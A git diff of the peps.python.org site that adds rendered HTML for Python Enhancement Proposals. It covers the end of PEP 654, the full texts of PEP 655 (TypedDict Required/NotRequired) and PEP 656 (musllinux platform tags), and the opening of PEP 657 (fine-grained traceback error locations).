This example clearly demonstrates how unintuitive and cumbersome handling +of multiple errors is in current Python. The exception handling logic has +to be in a separate closure and is fairly low level, requiring the writer to +have non-trivial understanding of both Python exceptions mechanics and the +Trio APIs. Instead of using the try..except block we have to use a +with block. We need to explicitly reraise exceptions we are not handling. +Handling more exception types or implementing more complex +exception handling logic will only further complicate the code to the point +of it being unreadable.

+
+
+

See Also

+
    +
  • An analysis of how exception groups will likely be used in asyncio +programs: [10].
  • +
  • The issue where the except* concept was first formalized: [12].
  • +
  • MultiError2 design document: [3].
  • +
  • Reporting Multiple Errors in the Hypothesis library: [7].
  • +
+
+
+

Acknowledgements

+

We wish to thank Nathaniel J. Smith and the other Trio developers for their +work on structured concurrency. We borrowed the idea of constructing an +exception tree whose nodes are exceptions from MultiError, and the split() +API from the design document for MultiError V2. The discussions on python-dev +and elsewhere helped us improve upon the first draft of the PEP in multiple +ways, both the design and the exposition. For this we appreciate all those who +contributed ideas and asked good questions: Ammar Askar, Matthew Barnett, +Ran Benita, Emily Bowman, Brandt Bucher, Joao Bueno, Baptiste Carvello, +Rob Cliffe, Alyssa Coghlan, Steven D’Aprano, Caleb Donovick, Steve Dower, +Greg Ewing, Ethan Furman, Pablo Salgado, Jonathan Goble, Joe Gottman, Thomas Grainger, +Larry Hastings, Zac Hatfield-Dodds, Chris Jerdonek, Jim Jewett, Sven Kunze, +Łukasz Langa, Glenn Linderman, Paul Moore, Antoine Pitrou, Ivan Pozdeev, +Patrick Reader, Terry Reedy, Sascha Schlemmer, Barry Scott, Mark Shannon, +Damian Shaw, Cameron Simpson, Gregory Smith, Paul Sokolovsky, Calvin Spealman, +Steve Stagg, Victor Stinner, Marco Sulla, Petr Viktorin and Barry Warsaw.

+
+
+

Acceptance

+

PEP 654 was accepted by Thomas Wouters on Sep 24, 2021.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0654.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0655/index.html b/pep-0655/index.html new file mode 100644 index 00000000000..c55d2e6956a --- /dev/null +++ b/pep-0655/index.html @@ -0,0 +1,756 @@ +PEP 655 – Marking individual TypedDict items as required or potentially-missing | peps.python.org
+
+

+
+
+

PEP 655 – Marking individual TypedDict items as required or potentially-missing

+
+
Author:
+
David Foster <david at dafoster.net>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Typing-SIG thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
30-Jan-2021
+
Python-Version:
+
3.11
+
Post-History:
+
31-Jan-2021, 11-Feb-2021, 20-Feb-2021, 26-Feb-2021, 17-Jan-2022, 28-Jan-2022
+
Resolution:
+
Python-Dev message
+
+
+
+
+
+

Attention

+

This PEP is a historical document: see Required and NotRequired, +typing.Required and +typing.NotRequired for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+


+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

PEP 589 defines notation +for declaring a TypedDict with all required keys and notation for defining +a TypedDict with all potentially-missing keys; however, it +does not provide a mechanism to declare some keys as required and others +as potentially-missing. This PEP introduces two new notations: +Required[], which can be used on individual items of a +TypedDict to mark them as required, and +NotRequired[], which can be used on individual items +to mark them as potentially-missing.

+

This PEP makes no Python grammar changes. Correct usage +of required and potentially-missing keys of TypedDicts is intended to be +enforced only by static type checkers and need not be enforced by +Python itself at runtime.
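
+
A small demo of that division of labour (assuming a Python 3.11+ runtime):
the qualifiers are metadata for static type checkers, and the interpreter
performs no validation of its own:

+
from typing import TypedDict, NotRequired
+
+class Movie(TypedDict):
+    title: str
+    year: NotRequired[int]
+
+m = Movie(title="Blade Runner")  # 'year' may be omitted
+bad = Movie(title=123)           # wrong value type, yet no runtime error
+print(m, bad)
+
+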

+
+
+

Motivation

+

It is not uncommon to want to define a TypedDict with some keys that are +required and others that are potentially-missing. Currently the only way +to define such a TypedDict is to declare one TypedDict with one value +for total and then inherit it from another TypedDict with a +different value for total:

+
class _MovieBase(TypedDict):  # implicitly total=True
+    title: str
+
+class Movie(_MovieBase, total=False):
+    year: int
+
+
+

Having to declare two different TypedDict types for this purpose is +cumbersome.

+

This PEP introduces two new type qualifiers, typing.Required and +typing.NotRequired, which allow defining a single TypedDict with +a mix of both required and potentially-missing keys:

+
class Movie(TypedDict):
+    title: str
+    year: NotRequired[int]
+
+
+

This PEP also makes it possible to define TypedDicts in the +alternative functional syntax +with a mix of required and potentially-missing keys, +which is not currently possible at all because the alternative syntax does +not support inheritance:

+
Actor = TypedDict('Actor', {
+    'name': str,
+    # "in" is a keyword, so the functional syntax is necessary
+    'in': NotRequired[List[str]],
+})
+
+
+
+
+

Rationale

+

One might think it unusual to propose notation that prioritizes marking +required keys rather than potentially-missing keys, as is +customary in other languages like TypeScript:

+
interface Movie {
+    title: string;
+    year?: number;  // ? marks potentially-missing keys
+}
+
+
+

The difficulty is that the best word for marking a potentially-missing +key, Optional[], is already used in Python for a completely +different purpose: marking values that could be either of a particular +type or None. In particular the following does not work:

+
class Movie(TypedDict):
+    ...
+    year: Optional[int]  # means int|None, not potentially-missing!
+
+
+

Attempting to use any synonym of “optional” to mark potentially-missing +keys (like Missing[]) would be too similar to Optional[] +and be easy to confuse with it.

+

Thus it was decided to focus on positive-form phrasing for required keys +instead, which is straightforward to spell as Required[].

+

Nevertheless it is common for folks wanting to extend a regular +(total=True) TypedDict to only want to add a small number of +potentially-missing keys, which necessitates a way to mark keys that are +not required and potentially-missing, and so we also allow the +NotRequired[] form for that case.

+
+
+

Specification

+

The typing.Required type qualifier is used to indicate that a +variable declared in a TypedDict definition is a required key:

+
class Movie(TypedDict, total=False):
+    title: Required[str]
+    year: int
+
+
+

Additionally the typing.NotRequired type qualifier is used to +indicate that a variable declared in a TypedDict definition is a +potentially-missing key:

+
class Movie(TypedDict):  # implicitly total=True
+    title: str
+    year: NotRequired[int]
+
+
+

It is an error to use Required[] or NotRequired[] in any +location that is not an item of a TypedDict. +Type checkers must enforce this restriction.
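
+
A short sketch of such a misuse (fetch_year is a hypothetical function; the
annotation evaluates without error at runtime, but a static type checker
must reject it):

+
from typing import NotRequired
+
+def fetch_year(default: NotRequired[int]) -> None:  # ERROR: not a TypedDict item
+    ...
+
+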

+

It is valid to use Required[] and NotRequired[] even for +items where it is redundant, to enable additional explicitness if desired:

+
class Movie(TypedDict):
+    title: Required[str]  # redundant
+    year: NotRequired[int]
+
+
+

It is an error to use both Required[] and NotRequired[] at the +same time:

+
class Movie(TypedDict):
+    title: str
+    year: NotRequired[Required[int]]  # ERROR
+
+
+

Type checkers must enforce this restriction. +The runtime implementations of Required[] and NotRequired[] +may also enforce this restriction.

+

The alternative functional syntax +for TypedDict also supports +Required[] and NotRequired[]:

+
Movie = TypedDict('Movie', {'name': str, 'year': NotRequired[int]})
+
+
+
+

Interaction with total=False

+

Any PEP 589-style TypedDict declared with total=False is equivalent +to a TypedDict with an implicit total=True definition with all of its +keys marked as NotRequired[].

+

Therefore:

+
class _MovieBase(TypedDict):  # implicitly total=True
+    title: str
+
+class Movie(_MovieBase, total=False):
+    year: int
+
+
+

is equivalent to:

+
class _MovieBase(TypedDict):
+    title: str
+
+class Movie(_MovieBase):
+    year: NotRequired[int]
+
+
+
+
+

Interaction with Annotated[]

+

Required[] and NotRequired[] can be used with Annotated[], +in any nesting order:

+
class Movie(TypedDict):
+    title: str
+    year: NotRequired[Annotated[int, ValueRange(-9999, 9999)]]  # ok
+
+
+
class Movie(TypedDict):
+    title: str
+    year: Annotated[NotRequired[int], ValueRange(-9999, 9999)]  # ok
+
+
+

In particular allowing Annotated[] to be the outermost annotation +for an item allows better interoperability with non-typing uses of +annotations, which may always want Annotated[] as the outermost annotation. +[3]

+
+
+

Runtime behavior

+
+

Interaction with get_type_hints()

+

typing.get_type_hints(...) applied to a TypedDict will by default +strip out any Required[] or NotRequired[] type qualifiers, +since these qualifiers are expected to be inconvenient for code +casually introspecting type annotations.

+

typing.get_type_hints(..., include_extras=True) however +will retain Required[] and NotRequired[] type qualifiers, +for advanced code introspecting type annotations that +wishes to preserve all annotations in the original source:

+
class Movie(TypedDict):
+    title: str
+    year: NotRequired[int]
+
+assert get_type_hints(Movie) == \
+    {'title': str, 'year': int}
+assert get_type_hints(Movie, include_extras=True) == \
+    {'title': str, 'year': NotRequired[int]}
+
+
+
+
+

Interaction with get_origin() and get_args()

+

typing.get_origin() and typing.get_args() will be updated to +recognize Required[] and NotRequired[]:

+
assert get_origin(Required[int]) is Required
+assert get_args(Required[int]) == (int,)
+
+assert get_origin(NotRequired[int]) is NotRequired
+assert get_args(NotRequired[int]) == (int,)
+
+
+
+
+

Interaction with __required_keys__ and __optional_keys__

+

An item marked with Required[] will always appear +in the __required_keys__ for its enclosing TypedDict. Similarly an item +marked with NotRequired[] will always appear in __optional_keys__.

+
assert Movie.__required_keys__ == frozenset({'title'})
+assert Movie.__optional_keys__ == frozenset({'year'})
+
+
+
+
+
+
+

Backwards Compatibility

+

No backward incompatible changes are made by this PEP.

+
+
+

How to Teach This

+

To define a TypedDict where most keys are required and some are +potentially-missing, define a single TypedDict as normal +(without the total keyword) +and mark those few keys that are potentially-missing with NotRequired[].

+

To define a TypedDict where most keys are potentially-missing and a few are +required, define a total=False TypedDict +and mark those few keys that are required with Required[].

+

If some items accept None in addition to a regular value, it is +recommended that the TYPE|None notation be preferred over +Optional[TYPE] for marking such item values, to avoid using +Required[] or NotRequired[] alongside Optional[] +within the same TypedDict definition:

+

Yes:

+
from __future__ import annotations  # for Python 3.7-3.9
+
+class Dog(TypedDict):
+    name: str
+    owner: NotRequired[str|None]
+
+
+

Okay (required for Python 3.5.3-3.6):

+
class Dog(TypedDict):
+    name: str
+    owner: 'NotRequired[str|None]'
+
+
+

No:

+
class Dog(TypedDict):
+    name: str
+    # ick; avoid using both Optional and NotRequired
+    owner: NotRequired[Optional[str]]
+
+
+
+

Usage in Python <3.11

+

If your code supports Python <3.11 and wishes to use Required[] or +NotRequired[] then it should use typing_extensions.TypedDict rather +than typing.TypedDict because the latter will not understand +(Not)Required[]. In particular __required_keys__ and +__optional_keys__ on the resulting TypedDict type will not be correct:

+

Yes (Python 3.11+ only):

+
from typing import NotRequired, TypedDict
+
+class Dog(TypedDict):
+    name: str
+    owner: NotRequired[str|None]
+
+
+

Yes (Python <3.11 and 3.11+):

+
from __future__ import annotations  # for Python 3.7-3.9
+
+from typing_extensions import NotRequired, TypedDict  # for Python <3.11 with (Not)Required
+
+class Dog(TypedDict):
+    name: str
+    owner: NotRequired[str|None]
+
+
+

No (Python <3.11 and 3.11+):

+
from typing import TypedDict  # oops: should import from typing_extensions instead
+from typing_extensions import NotRequired
+
+class Movie(TypedDict):
+    title: str
+    year: NotRequired[int]
+
+assert Movie.__required_keys__ == frozenset({'title', 'year'})  # yikes
+assert Movie.__optional_keys__ == frozenset()  # yikes
+
+
+
+
+
+

Reference Implementation

+

The mypy +0.930, +pyright +1.1.117, +and pyanalyze +0.4.0 +type checkers support Required and NotRequired.

+

A reference implementation of the runtime component is provided in the +typing_extensions +module.

+
+
+

Rejected Ideas

+
+

Special syntax around the key of a TypedDict item

+
class MyThing(TypedDict):
+    opt1?: str  # may not exist, but if exists, value is string
+    opt2: Optional[str]  # always exists, but may have None value
+
+
+

This notation would require Python grammar changes and it is not +believed that marking TypedDict items as required or potentially-missing +would meet the high bar required to make such grammar changes.

+
class MyThing(TypedDict):
+    Optional[opt1]: str  # may not exist, but if exists, value is string
+    opt2: Optional[str]  # always exists, but may have None value
+
+
+

This notation causes Optional[] to take on different meanings depending +on where it is positioned, which is inconsistent and confusing.

+

Also, “let’s just not put funny syntax before the colon.” [1]

+
+
+

Marking required or potentially-missing keys with an operator

+

We could use unary + as shorthand to mark a required key, unary +- to mark a potentially-missing key, or unary ~ to mark a key +with opposite-of-normal totality:

+
class MyThing(TypedDict, total=False):
+    req1: +int    # + means a required key, or Required[]
+    opt1: str
+    req2: +float
+
+class MyThing(TypedDict):
+    req1: int
+    opt1: -str    # - means a potentially-missing key, or NotRequired[]
+    req2: float
+
+class MyThing(TypedDict):
+    req1: int
+    opt1: ~str    # ~ means an opposite-of-normal-totality key
+    req2: float
+
+
+

Such operators could be implemented on type via the __pos__, +__neg__ and __invert__ special methods without modifying the +grammar.

+

It was decided that it would be prudent to introduce long-form notation +(i.e. Required[] and NotRequired[]) before introducing +any short-form notation. Future PEPs may reconsider introducing this +or other short-form notation options.

+

Note when reconsidering introducing this short-form notation that ++, -, and ~ already have existing meanings in the Python +typing world: covariant, contravariant, and invariant:

+
>>> from typing import TypeVar
+>>> (TypeVar('T', covariant=True), TypeVar('U', contravariant=True), TypeVar('V'))
+(+T, -U, ~V)
+
+
+
+
+

Marking absence of a value with a special constant

+

We could introduce a new type-level constant which signals the absence +of a value when used as a union member, similar to JavaScript’s +undefined type, perhaps called Missing:

+
class MyThing(TypedDict):
+    req1: int
+    opt1: str|Missing
+    req2: float
+
+
+

Such a Missing constant could also be used for other scenarios such +as the type of a variable which is only conditionally defined:

+
class MyClass:
+    attr: int|Missing
+
+    def __init__(self, set_attr: bool) -> None:
+        if set_attr:
+            self.attr = 10
+
+
+
def foo(set_attr: bool) -> None:
+    if set_attr:
+        attr = 10
+    reveal_type(attr)  # int|Missing
+
+
+
+

Misalignment with how unions apply to values

+

However this use of ...|Missing, equivalent to +Union[..., Missing], doesn’t align well with what a union normally +means: Union[...] always describes the type of a value that is +present. By contrast, missingness or non-totality is a property of a +variable instead. Current precedents for marking properties of a +variable include Final[...] and ClassVar[...], with which the +proposal for Required[...] is aligned.

+
+
+

Misalignment with how unions are subdivided

+

Furthermore the use of Union[..., Missing] doesn’t align with the +usual ways that union values are broken down: Normally you can eliminate +components of a union type using isinstance checks:

+
class Packet:
+    data: Union[str, bytes]
+
+def send_data(packet: Packet) -> None:
+    if isinstance(packet.data, str):
+        reveal_type(packet.data)  # str
+        packet_bytes = packet.data.encode('utf-8')
+    else:
+        reveal_type(packet.data)  # bytes
+        packet_bytes = packet.data
+    socket.send(packet_bytes)
+
+
+

However if we were to allow Union[..., Missing] you’d either have to +eliminate the Missing case with hasattr for object attributes:

+
class Packet:
+    data: Union[str, Missing]
+
+def send_data(packet: Packet) -> None:
+    if hasattr(packet, 'data'):
+        reveal_type(packet.data)  # str
+        packet_bytes = packet.data.encode('utf-8')
+    else:
+        reveal_type(packet.data)  # Missing? error?
+        packet_bytes = b''
+    socket.send(packet_bytes)
+
+
+

or a check against locals() for local variables:

+
def send_data(packet_data: Optional[str]) -> None:
+    packet_bytes: Union[bytes, Missing]
+    if packet_data is not None:
+        packet_bytes = packet_data.encode('utf-8')
+
+    if 'packet_bytes' in locals():
+        reveal_type(packet_bytes)  # bytes
+        socket.send(packet_bytes)
+    else:
+        reveal_type(packet_bytes)  # Missing? error?
+
+
+

or a check via other means, such as against globals() for global +variables:

+
warning: Union[str, Missing]
+import sys
+if sys.version_info < (3, 6):
+    warning = 'Your version of Python is unsupported!'
+
+if 'warning' in globals():
+    reveal_type(warning)  # str
+    print(warning)
+else:
+    reveal_type(warning)  # Missing? error?
+
+
+

Weird and inconsistent. Missing is not really a value at all; it’s +an absence of definition and such an absence should be treated +specially.

+
+
+

Difficult to implement

+

Eric Traut from the Pyright type checker team has stated that +implementing a Union[..., Missing]-style notation would be +difficult. [2]

+
+
+

Introduces a second null-like value into Python

+

Defining a new Missing type-level constant would be very close to +introducing a new Missing value-level constant at runtime, creating +a second null-like runtime value in addition to None. Having two +different null-like constants in Python (None and Missing) would +be confusing. Many newcomers to JavaScript already have difficulty +distinguishing between its analogous constants null and +undefined.

+
+
+
+

Replace Optional with Nullable. Repurpose Optional to mean “optional item”.

+

Optional[] is too ubiquitous to deprecate, although use of it +may fade over time in favor of the T|None notation specified by PEP 604.

+
+
+

Change Optional to mean “optional item” in certain contexts instead of “nullable”

+

Consider the use of a special flag on a TypedDict definition to alter +the interpretation of Optional inside the TypedDict to mean +“optional item” rather than its usual meaning of “nullable”:

+
class MyThing(TypedDict, optional_as_missing=True):
+    req1: int
+    opt1: Optional[str]
+
+
+

or:

+
class MyThing(TypedDict, optional_as_nullable=False):
+    req1: int
+    opt1: Optional[str]
+
+
+

This would add more confusion for users because it would mean that in +some contexts the meaning of Optional[] is different than in +other contexts, and it would be easy to overlook the flag.

+
+
+

Various synonyms for “potentially-missing item”

+
    +
  • Omittable – too easy to confuse with optional
  • +
  • OptionalItem, OptionalKey – two words; too easy to confuse with +optional
  • +
  • MayExist, MissingOk – two words
  • +
  • Droppable – too similar to Rust’s Drop, which means something +different
  • +
  • Potential – too vague
  • +
  • Open – sounds like it applies to an entire structure rather than to an +item
  • +
  • Excludable
  • +
  • Checked
  • +
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0655.rst

+

Last modified: 2024-06-16 22:42:44 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0656/index.html b/pep-0656/index.html new file mode 100644 index 00000000000..b5a6c80b813 --- /dev/null +++ b/pep-0656/index.html @@ -0,0 +1,348 @@ +PEP 656 – Platform Tag for Linux Distributions Using Musl | peps.python.org
+
+

+
+
+

PEP 656 – Platform Tag for Linux Distributions Using Musl

+
+
Author:
+
Tzu-ping Chung <uranusjr at gmail.com>
+
Sponsor:
+
Brett Cannon <brett at python.org>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
17-Mar-2021
+
Post-History:
+
17-Mar-2021, 18-Apr-2021
+
Resolution:
+
Discourse message
+
+
+
+
+
+

Abstract

+

This PEP proposes a new platform tag series musllinux for +binary Python package distributions for a Python installation that +depends on musl on a Linux distribution. The tag works similarly to +the “perennial manylinux” platform tags specified in PEP 600, but +targeting platforms based on musl instead.

+
+
+

Motivation

+

With the wide use of containers, distributions such as Alpine Linux +[alpine] have been gaining more popularity than ever. Many of them are +based on musl [musl], a libc implementation different from glibc, and +therefore cannot use the existing manylinux platform tags. This +means that Python package projects cannot deploy binary distributions +on PyPI for them. Users of such projects demand build constraints from +those projects, putting an unnecessary burden on project maintainers.

+
+
+

Rationale

+

According to the documentation, musl has a stable ABI, and maintains +backwards compatibility [musl-compatibility] [compare-libcs], so a +binary compiled against an earlier version of musl is guaranteed to +run against a newer musl runtime [musl-compat-ml]. Therefore, we use +a scheme similar to the glibc-version-based manylinux tags, but +against musl versions instead of glibc.

+

Logic behind the new platform tag largely follows PEP 600 +(“perennial manylinux”), and requires wheels using this tag make +similar promises. Please refer to PEP 600 for more details on +rationale and reasoning behind the design.

+

The musllinux platform tags only apply to Python interpreters +dynamically linked against the musl libc and executed on the runtime +shared library, on a Linux operating system. Statically linked +interpreters or mixed builds with other libc implementations (such as +glibc) are out of scope and not supported by platform tags defined in +this document. Such interpreters should not claim compatibility with +musllinux platform tags.

+
+
+

Specification

+

Tags using the new scheme will take the form:

+
musllinux_${MUSLMAJOR}_${MUSLMINOR}_${ARCH}
+
+
+

This tag promises the wheel works on any mainstream Linux distribution +that uses musl version ${MUSLMAJOR}.${MUSLMINOR}, following the +perennial design. All other system-level dependency requirements rely +on the community’s definition of the intentionally vague “mainstream” +description introduced in PEP 600. A wheel may make use of newer +system dependencies when all mainstream distributions using the +specified musl version provide the dependency by default; once all +mainstream distributions on the musl version ship a certain dependency +version by default, users relying on older versions are automatically +removed from the coverage of that musllinux tag.

+
+

Reading the musl version

+

The musl version values can be obtained by executing the musl libc +shared library the Python interpreter is currently running on, and +parsing the output:

+
import re
+import subprocess
+
+def get_musl_major_minor(so: str) -> tuple[int, int] | None:
+    """Detect musl runtime version.
+
+    Returns a two-tuple ``(major, minor)`` that indicates musl
+    library's version, or ``None`` if the given libc .so does not
+    output expected information.
+
+    The libc library should output something like this to stderr::
+
+        musl libc (x86_64)
+        Version 1.2.2
+        Dynamic Program Loader
+    """
+    proc = subprocess.run([so], stderr=subprocess.PIPE, text=True)
+    lines = (line.strip() for line in proc.stderr.splitlines())
+    lines = [line for line in lines if line]
+    if len(lines) < 2 or lines[0][:4] != "musl":
+        return None
+    match = re.match(r"Version (\d+)\.(\d+)", lines[1])
+    if match:
+        return (int(match.group(1)), int(match.group(2)))
+    return None
+
+
+

There are currently two possible ways to find the musl library’s +location that a Python interpreter is running on, either with the +system ldd command [ldd], or by parsing the PT_INTERP +section’s value from the executable’s ELF header [elf].
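
+
As a rough sketch of the second approach (an assumption-heavy illustration:
64-bit little-endian ELF only, no error handling), the PT_INTERP entry of
the running interpreter's executable names the dynamic loader, which on
musl-based systems is the musl shared library itself (for example
/lib/ld-musl-x86_64.so.1 on Alpine); the returned path can then be passed
to get_musl_major_minor() above:

+
import struct
+import sys
+
+def find_interpreter(path=sys.executable):
+    with open(path, "rb") as f:
+        ident = f.read(16)
+        if ident[:4] != b"\x7fELF" or ident[4] != 2:  # ELFCLASS64 only
+            return None
+        f.seek(32)                                  # e_phoff
+        (e_phoff,) = struct.unpack("<Q", f.read(8))
+        f.seek(54)                                  # e_phentsize, e_phnum
+        e_phentsize, e_phnum = struct.unpack("<HH", f.read(4))
+        for i in range(e_phnum):
+            f.seek(e_phoff + i * e_phentsize)
+            (p_type,) = struct.unpack("<I", f.read(4))
+            if p_type != 3:                         # PT_INTERP
+                continue
+            f.seek(e_phoff + i * e_phentsize + 8)   # p_offset
+            (p_offset,) = struct.unpack("<Q", f.read(8))
+            f.seek(e_phoff + i * e_phentsize + 32)  # p_filesz
+            (p_filesz,) = struct.unpack("<Q", f.read(8))
+            f.seek(p_offset)
+            return f.read(p_filesz).rstrip(b"\x00").decode()
+    return None
+
+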

+
+
+

Formatting the tag

+

Distributions using the tag make similar promises to those described +in PEP 600, including:

+
    +
  1. The distribution works on any mainstream Linux distributions with +musl version ${MUSLMAJOR}.${MUSLMINOR} or later.
  2. +
  3. The distribution’s ${ARCH} matches the return value of +sysconfig.get_platform() on the host system, replacing period +(.) and hyphen (-) characters with underscores (_), as +outlined in PEP 425 and PEP 427.
  4. +
+

Example values:

+
musllinux_1_1_x86_64   # musl 1.1 running on x86-64.
+musllinux_1_2_aarch64  # musl 1.2 running on ARM 64-bit.
+
+
+

The value can be formatted with the following Python code:

+
import sysconfig
+
+def format_musllinux(musl_version: tuple[int, int]) -> str:
+    os_name, sep, arch = sysconfig.get_platform().partition("-")
+    assert os_name == "linux" and sep, "Not a Linux"
+    arch = arch.replace(".", "_").replace("-", "_")
+    return f"musllinux_{musl_version[0]}_{musl_version[1]}_{arch}"
+
+
+
+
+

Recommendations to package indexes

+

It is recommended for Python package repositories, including PyPI, to +accept platform tags matching the following regular expression:

+
musllinux_([0-9]+)_([0-9]+)_([^.-]+)
+
+
+
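
A small usage sketch of that pattern (the tag values are illustrative):

+
import re
+
+TAG_RE = re.compile(r"musllinux_([0-9]+)_([0-9]+)_([^.-]+)")
+
+assert TAG_RE.fullmatch("musllinux_1_2_x86_64")
+assert TAG_RE.fullmatch("musllinux_1_1_aarch64")
+assert not TAG_RE.fullmatch("musllinux_1_2_x86-64")  # '-' not allowed in arch
+
+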

Python package repositories may impose additional requirements to +reject Wheels with known issues, including but not limited to:

+
    +
  • A musllinux_1_1 wheel containing symbols only available in musl +1.2 or later.
  • +
  • Wheel that depends on external libraries not considered generally +available to the intended audience of the package index.
  • +
  • A platform tag claiming compatibility to a non-existent musl version +(like musllinux_9000_0).
  • +
+

Such policies are ultimately up to individual package repositories. +It is not the author’s intention to impose restrictions to the +maintainers.

+
+
+
+

Backwards Compatibility

+

There are no backwards compatibility concerns in this PEP.

+
+
+

Rejected Ideas

+
+

Create a platform tag based specifically for Alpine Linux

+

Past experience on the manylinux tag series shows this approach +would be too costly time-wise. The author feels the “works well with +others” rule is more inclusive and works well enough in practice.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0656.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0657/index.html b/pep-0657/index.html new file mode 100644 index 00000000000..072c02a36a8 --- /dev/null +++ b/pep-0657/index.html @@ -0,0 +1,574 @@ +PEP 657 – Include Fine Grained Error Locations in Tracebacks | peps.python.org
+
+

+
+
+

PEP 657 – Include Fine Grained Error Locations in Tracebacks

+
+
Author:
+
Pablo Galindo <pablogsal at python.org>, +Batuhan Taskaya <batuhan at python.org>, +Ammar Askar <ammar at ammaraskar.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
08-May-2021
+
Python-Version:
+
3.11
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP proposes adding a mapping from each bytecode instruction to the start +and end column offsets of the line that generated them as well as the end line +number. This data will be used to improve tracebacks displayed by the CPython +interpreter in order to improve the debugging experience. The PEP also proposes +adding APIs that allow other tools (such as coverage analysis tools, profilers, +tracers, debuggers) to consume this information from code objects.

+
+
+

Motivation

+

The primary motivation for this PEP is to improve the feedback presented about +the location of errors to aid with debugging.

+

Python currently keeps a mapping of bytecode to line numbers from compilation. +The interpreter uses this mapping to point to the source line associated with +an error. While this line-level granularity for instructions is useful, a +single line of Python code can compile into dozens of bytecode operations +making it hard to track which part of the line caused the error.

+

Consider the following line of Python code:

+
x['a']['b']['c']['d'] = 1
+
+
+

If any of the values in the dictionaries are None, the error shown is:

+
Traceback (most recent call last):
+  File "test.py", line 2, in <module>
+    x['a']['b']['c']['d'] = 1
+TypeError: 'NoneType' object is not subscriptable
+
+
+

From the traceback, it is impossible to determine which one of the dictionaries +had the None element that caused the error. Users often have to attach a +debugger or split up their expression to track down the problem.

+

However, if the interpreter had a mapping of bytecode to column offsets as well +as line numbers, it could helpfully display:

+
Traceback (most recent call last):
+  File "test.py", line 2, in <module>
+    x['a']['b']['c']['d'] = 1
+    ~~~~~~~~~~~^^^^^
+TypeError: 'NoneType' object is not subscriptable
+
+
+

indicating to the user that the object x['a']['b'] must have been None. +This highlighting will occur for every frame in the traceback. For instance, if +a similar error is part of a complex function call chain, the traceback would +display the code associated to the current instruction in every frame:

+
Traceback (most recent call last):
+  File "test.py", line 14, in <module>
+    lel3(x)
+    ^^^^^^^
+  File "test.py", line 12, in lel3
+    return lel2(x) / 23
+           ^^^^^^^
+  File "test.py", line 9, in lel2
+    return 25 + lel(x) + lel(x)
+                ^^^^^^
+  File "test.py", line 6, in lel
+    return 1 + foo(a,b,c=x['z']['x']['y']['z']['y'], d=e)
+                         ~~~~~~~~~~~~~~~~^^^^^
+TypeError: 'NoneType' object is not subscriptable
+
+
+

This problem presents itself in the following situations.

+
    +
  • When passing down multiple objects to function calls while +accessing the same attribute in them. +For instance, this error:
    Traceback (most recent call last):
    +  File "test.py", line 19, in <module>
    +    foo(a.name, b.name, c.name)
    +AttributeError: 'NoneType' object has no attribute 'name'
    +
    +
    +

    With the improvements in this PEP this would show:

    +
    Traceback (most recent call last):
    +  File "test.py", line 17, in <module>
    +    foo(a.name, b.name, c.name)
    +                ^^^^^^
    +AttributeError: 'NoneType' object has no attribute 'name'
    +
    +
    +
  • +
  • When dealing with lines with complex mathematical expressions, +especially with libraries such as numpy where arithmetic +operations can fail based on the arguments. For example:
    Traceback (most recent call last):
    +  File "test.py", line 1, in <module>
    +    x = (a + b) @ (c + d)
    +ValueError: operands could not be broadcast together with shapes (1,2) (2,3)
    +
    +
    +

    There is no clear indication as to which operation failed, was it the addition +on the left, the right or the matrix multiplication in the middle? With this +PEP the new error message would look like:

    +
    Traceback (most recent call last):
    +  File "test.py", line 1, in <module>
    +    x = (a + b) @ (c + d)
    +                   ~~^~~
    +ValueError: operands could not be broadcast together with shapes (1,2) (2,3)
    +
    +
    +

    Giving a much clearer and easier to debug error message.

    +
  • +
+

Debugging aside, this extra information would also be useful for code +coverage tools, enabling them to measure expression-level coverage instead of +just line-level coverage. For instance, given the following line:

+
x = foo() if bar() else baz()
+
+
+

coverage, profile or state analysis tools will highlight the full line in both +branches, making it impossible to differentiate which branch was taken. This is +a known problem in pycoverage.

+

Similar efforts to this PEP have taken place in other languages such as Java in +the form of JEP358. NullPointerExceptions in Java were similarly nebulous when +it came to lines with complicated expressions. A NullPointerException would +provide very little aid in finding the root cause of an error. The +implementation for JEP358 is fairly complex, requiring walking back through the +bytecode by using a control flow graph analyzer and decompilation techniques to +recover the source code that led to the null pointer. Although the complexity +of this solution is high and requires maintenance for the decompiler every time +Java bytecode is changed, this improvement was deemed to be worth it for the +extra information provided for just one exception type.

+
+
+

Rationale

+

In order to identify the range of source code being executed when exceptions +are raised, this proposal requires adding new data for every bytecode +instruction. This will have an impact on the size of pyc files on disk and +the size of code objects in memory. The authors of this proposal have chosen +the data types in a way that tries to minimize this impact. The proposed +overhead is storing two uint8_t (one for the start offset and one for the +end offset) and the end line information for every bytecode instruction (in +the same encoded fashion as the start line is stored currently).

+

As an illustrative example to gauge the impact of this change, we have +calculated that including the start and end offsets will increase the size of +the standard library’s pyc files by 22% (6MB) from 28.4MB to 34.7MB. The +overhead in memory usage will be the same (assuming the full standard library +is loaded into the same program). We believe that this is a very acceptable +number since the order of magnitude of the overhead is very small, especially +considering the storage size and memory capabilities of modern computers. +Additionally, in general the memory size of a Python program is not dominated +by code objects. To check this assumption we have executed the test suite of +several popular PyPI projects (including NumPy, pytest, Django and Cython) as +well as several applications (Black, pylint, mypy executed over either mypy or +the standard library) and we found that code objects normally represent 3-6% of +the average memory size of the program.

+

